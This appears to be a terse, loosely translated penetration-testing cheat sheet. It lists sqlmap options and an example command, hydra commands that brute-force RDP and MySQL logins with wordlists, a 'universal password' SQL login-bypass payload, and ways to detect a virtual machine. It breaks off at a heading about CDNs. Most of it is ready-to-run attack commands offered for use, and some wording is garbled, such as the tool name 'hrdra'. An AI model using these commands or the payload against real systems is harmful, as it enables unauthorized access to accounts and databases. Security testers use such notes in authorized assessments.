One, sqlmap
-p specifies the injection point
--Technique specifies the injection type
B: Boolean-based blind (Boolean injection)
E: Error-based (error-based injection)
U: Union query-based (joint query injection possible)
S: Stacked queries (multiple statement query injection possible)
T: Time-based blind (Based on time delay injection)
Q: Inline queries (nested query injection)
--proxy=http://127.0.0.1:8080
--batch
Oracle's default port bai slogan is 1521
e.g. py -2 sqlmap.py -r C:\Users\HP\Desktop\1.txt --proxy=http://127.0.0.1:8080 -p zkzh --batch
-u "It is better to add double quotes"
Two, blasting 3389
hrdra 192.168.0.44 rdp -L user.txt -P pass.txt
hrdra 192.168.0.44 -l root -P pass.txt mysql -t 3 -v -f
-f blast out the first successful password to stop
Three, universal password
Operator execution precedence of T-sql language
‘||1||’
Four, determine whether it is a virtual machine
windows:systeminfo
Physical machine:
系统制造商: To be filled by O.E.M.
系统型号: To be filled by O.E.M.
virtual machine:
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
Linux: dmidecode -s system-product-name ===>Note: root permission is required
Physical machine: RH2288H V3
Virtual machine: VMware Virtual Platform
Five, determine whether there is a CDN